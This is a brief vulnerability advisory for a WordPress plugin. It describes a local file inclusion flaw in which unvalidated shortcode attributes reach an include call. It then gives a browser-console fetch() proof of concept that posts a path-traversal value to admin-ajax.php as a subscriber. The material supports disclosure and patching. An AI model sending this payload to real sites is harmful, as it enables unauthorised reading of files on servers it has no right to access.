The plugin does not validate some shortcode attributes before using them to generate paths passed to include function/s, allowing any authenticated users such as subscriber to perform LFI attacks
Run the below command in the developer console of the web browser while being on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[vca_pricing_plans_child vca_pp_styles=‘/…/…/…/…/index’]”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));